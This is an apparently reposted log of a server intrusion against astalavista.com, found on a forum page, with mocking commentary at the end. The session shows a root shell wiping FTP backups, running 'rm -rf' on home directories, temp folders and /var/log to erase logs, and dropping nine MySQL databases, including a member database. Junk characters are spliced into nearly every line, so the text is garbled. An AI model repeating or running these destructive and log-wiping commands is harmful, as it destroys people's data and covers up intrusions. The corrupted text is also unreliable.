6 ^; o" C n" N$ t0 C9 O-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar& a6 ^: g( N( Q
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar7 L$ l3 G# g7 {7 ^" S7 O
[snip]
% F5 |5 h5 r! X, d9 w226 Transfer complete.8 n5 C- @7 U7 }
ftp> mdelete *) ~& m3 K( W7 H m" |$ g
ftp> ls -la
7 F- I6 p( A+ h$ c& p! R) @227 Entering Passive Mode (212,254,194,163,2,193)
9 V* y4 E% `. b2 j1 ^150 Opening BINARY mode data connection for ‘file list’.
9 z' G9 i. ?3 C. d7 P226 Transfer complete./ h+ Y+ L" R5 {% U+ H+ M* W
ftp>
C# w& ?. y4 G) D$ ?& r! I% P3 K+ Q& A) B; G5 z% B+ R
sh-3.2# cd /home
" N% W8 M9 N$ c& ksh-3.2# ls -la
% h3 ]" X5 I9 ~. btotal 1201 w/ }, D6 [6 d
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .' s, T4 f2 O& d$ _6 r
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
6 ^: B: F7 f) w* ddrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
+ o3 s& J- r& T+ m-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
7 l3 w1 U4 [8 \& P# r2 k# n/ ~-rw——- 1 root root 8192 Jun 3 02:45 aquota.user7 k$ h8 R$ T+ ~6 N
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet! I8 i* J E3 I& F; C
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup* ]( R: L3 P Y: n u3 o. d% Q
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161! I' w% T( I; L' n
drwx–x–x 10 com com 4096 Apr 28 12:40 com
1 `7 u2 D1 j1 m6 Fdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
* w4 a- a$ }1 }# gdrwx—— 3 jon jon 4096 Sep 21 2007 jon
! \( }0 K) m8 L' X1 _2 @drwx—— 2 root root 16384 Sep 11 2007 lost+found* ~3 T) {* H9 E) i
drwxr-xr-x 2 root root 4096 Sep 14 2007 my5 D4 F, g, Z' D5 Z
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata9 Y+ `3 }+ o: H+ B& E: M& a" e3 D' N
drwx—— 2 jon jon 4096 Sep 15 2007 test4 \) F0 G4 k' W6 h9 o4 _& P! b+ R
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp: [/ i c/ b/ t6 d
! [5 w" A6 M$ s% s0 [sh-3.2# rm -rf backup/
' y+ @- C7 l) y! {. Rsh-3.2# rm -rf backup.14161/! Y% B! [5 y9 ~7 \: A
sh-3.2# rm -rf ftp/8 D0 N, U ]7 S! w0 V
sh-3.2# rm -rf jon/9 Y/ ?. G g7 r$ I" o
sh-3.2# rm -rf my/
( N' h' J( e4 Y8 P6 ush-3.2# rm -rf mysqldata/4 _" h, |6 B" S$ ]0 N0 m8 v
sh-3.2# rm -rf test/
% Z7 o/ C2 |1 ]0 y2 d( qsh-3.2# rm -rf tmp/
- h* f' k7 U+ R( P; zsh-3.2# cd ~
! R' f% S& Z" X" Q' O+ t7 Csh-3.2# rm -rf ** _0 H; w V8 r. C8 u8 N0 }2 V
sh-3.2# rm -rf /var/log/
7 y0 _+ U' Q+ g1 Z% W) qrm: cannot remove directory `/var/log//proftpd’: Directory not empty- v( O* ] |' K* {" S1 \, \
sh-3.2# rm -rf /home/*
) f! p8 p4 X( g. f$ T* ?7 X. i) A( Wsh-3.2# mysql
# r7 G5 G' n( X4 mWelcome to the MySQL monitor. Commands end with ; or \g.
& a; D* o- h7 WYour MySQL connection id is 407156- H" T1 g, T& E
Server version: 5.0.45-community-log MySQL Community Edition (GPL)2 k* a( {0 a% x6 v) g4 w
+ Q& l5 a( H% p2 j0 Q, d5 O# bType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.: T! K: ]* _# S- ? w/ ?
( S* L( ?6 m# R' f7 m' y3 R4 m4 Q/ Y# ?mysql> show databases;9 K$ E8 N+ w d' ~( e7 q( t
+———————–+( r$ f+ j9 f. ]7 ~& ] c# p
| Database |
( Z. ?3 l8 E1 c, C% o; ^2 y+———————–+( U( `7 \ ?& T5 m4 S# a, V
| information_schema |0 ]8 {* {9 g/ b+ U
| astanet_ads |4 H( i# c' b0 h) V7 { l% ?% g
| astanet_mailing_lists |
0 K% Q4 M% u Q3 s5 C. \| astanet_mediawiki |
r, q' O2 A2 ^* e2 r; F| astanet_membersystem |8 r% m$ d$ X+ Y8 G: }* s
| com_contrexx |1 R* G5 v* A- F0 O3 f- w1 Z7 ]
| com_contrexx2 |+ w3 f M* R7 A+ g$ I: g! @
| com_contrexx2_live |/ Y$ ]+ {/ P+ Z `1 @# _
| da_roundcube |8 G% Z8 B* K* R8 g; g5 p
| dolphin |* Q5 y9 C( {: Y8 x& [
| ideapool |
. r& e$ s8 p/ Z* `3 W| mysql |# r3 P' L" ~: J6 Z
| test |
+ b% v- |6 T) }) E| yourmaster |
4 q- ^( o/ q% d. P2 p% F+———————–+
$ j3 k& \& _4 p4 Y14 rows in set (0.03 sec)2 Q; q4 u0 D, H7 `% Q% `
6 h- b' d" u- G) h+ V8 t. dmysql> drop database astanet_membersystem;
6 h9 g) x0 r1 d9 LdroQuery OK, 46 rows affected (0.81 sec)1 l; L; a$ k' c5 c; \
0 ^ r/ R% \' A& e* A" i6 [* gmysql> drop database com_contrexx;
3 r. n. r/ h; j& [* ]- U. A, z( w4 TQuery OK, 211 rows affected (2.72 sec)
3 {, _ @+ z- g6 t' ~5 F7 C+ M0 o2 n+ ~
mysql> drop database com_contrexx2;
3 A f, z. a/ @$ _) }7 ZQuery OK, 237 rows affected (2.23 sec)$ M( b+ \1 l: C
) P& [' L1 l1 y4 `1 E2 F; D, Qmysql> drop database com_contrexx2_live;
# [% x+ M$ X( Q' L# l! DQuery OK, 227 rows affected (7.63 sec)
0 Y7 V3 m. l2 o* } \; S. C6 J( o* S7 e1 c2 v) J( F4 f
mysql> drop database ideapool;
4 G& J, s+ m# g) T6 N' |# Q9 b0 _- kQuery OK, 69 rows affected (0.19 sec)
# A0 q) u6 \+ n7 _: G# @4 `5 e& r5 \* H9 I0 d5 o* G1 J
mysql> drop database yourmaster;) j; n# c G3 d" n1 o3 n+ j2 v
Query OK, 158 rows affected (0.55 sec)& l/ s( e3 s$ P" J6 F' r
, K2 p3 _1 @! j2 N7 R" W- Jmysql> drop database astanet_ads;4 W) i# N5 G7 z# _- B3 x V
Query OK, 9 rows affected (0.11 sec)
% Y) l4 Q) ~( t! R: G* _
: K" z) T" E, ]4 H) Rmysql> drop database astanet_mailing_lists;
6 d3 k3 ~7 K- k1 _+ @1 ZQuery OK, 24 rows affected (1.47 sec)
4 N# U2 ?/ C1 e) R' v6 L& h# x
1 \3 }4 r, K# z2 K3 R( F! [mysql> drop database astanet_mediawiki;
/ |' @7 e- R! ~: e- M6 zQuery OK, 31 rows affected (0.51 sec)
3 h9 g5 {! U+ S
( H9 |6 H# x. P. Bmysql> show databases;
. K+ U( F( |) u7 ?/ x+——————–+
$ i9 F: Z5 M$ C' u$ l5 ]& q% f| Database | z0 R% }: p' E5 K _) ^8 t# g
+——————–+
6 ~& v, v+ N1 Y7 I3 b" h| information_schema |
U; n/ b- Y* `1 ?9 j K| da_roundcube |
C% A$ z, L/ u( {| dolphin |. s4 T. q: Q8 w5 @% V
| mysql |) ~4 @: I9 P- f" I% R0 U
| test |
& @6 Q/ `) d0 a2 e% j+ f0 S. p* L+——————–+2 ?( L8 _8 p. N Q, z
5 rows in set (0.00 sec)9 q( Q# Z8 w4 @1 o
# Z. P- R# M% l- @2 f2 }What a journey! We’re not sure exactly why the “Terminator” had any influence on
' @. n* y7 I6 W [7 h4 m5 f9 K3 @- w9 xtheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the2 B# }' U& C$ h& Z* ]
wrong to say this pack of morons *wont be back*.
; P, W; }1 M: y J; Z1 d! V' q |
发表于 2012-11-6 21:07:34
收藏
支持
反对